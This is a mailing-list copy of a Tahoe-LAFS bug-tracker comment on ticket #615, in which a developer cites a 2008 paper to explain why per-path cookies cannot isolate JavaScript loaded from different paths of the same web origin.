[tahoe-dev] [tahoe-lafs] #615: Can JavaScript loaded from Tahoe access all your content which is loaded from Tahoe?

tahoe-lafs trac at allmydata.org
Thu Oct 29 16:09:51 PDT 2009 

#615: Can JavaScript loaded from Tahoe access all your content which is loaded
from Tahoe?
---------------------------+------------------------------------------------
     Reporter:  zooko      |        Type:  defect           
       Status:  new        |    Priority:  critical         
    Milestone:  undecided  |   Component:  code-frontend-web
      Version:  1.3.0      |    Keywords:  newcaps security 
Launchpad_bug:             |  
---------------------------+------------------------------------------------

Comment(by davidsarah):

 Replying to [comment:1 swillden]:
 > Another option is to use cookies.  A cookie can also be made specific to
 a host/domain but also to a path.  As I understand it (haven't tested),
 Javascript loaded from path A should not have access to cookies set
 specific to path B.  If Tahoe were to set per-path cookies on first access
 to a path, then refuse later requests that don't include the right cookie,
 then Javascript from path B would not be able to successfully load URLs on
 path A, because it wouldn't have the cookie.

 > There are numerous downsides to the cookie approach ...

 Yes. The following paper (which is essential reading for this ticket)
 explains why this can't work from a security point of view:

  * Beware of Finer-Grained Origins
  * Collin Jackson and Adam Barth
  * In Web 2.0 Security and Privacy. (W2SP 2008)
  * http://crypto.stanford.edu/websec/origins/fgo.pdf

  * "Cookie Paths. One classic example of a sub-origin privilege is the
 ability to read cookies with "path" attributes. In order to read such a
 cookie, the path of the document's URL must extend the path of the cookie.
 However, the ability to read these cookies leaks to all documents in the
 origin because a same-origin document can inject script into a document
 with the appropriate path (even a 404 "not found" document) and read the
 cookies. This "vulnerability" has been known for a number of years ...
 This vulnerability was "fixed" by declaring the path attribute to be a
 convenience feature rather than a security feature."

-- 
Ticket URL: <http://allmydata.org/trac/tahoe/ticket/615#comment:6>
tahoe-lafs <http://allmydata.org>
secure decentralized file storage grid

More information about the tahoe-dev mailing list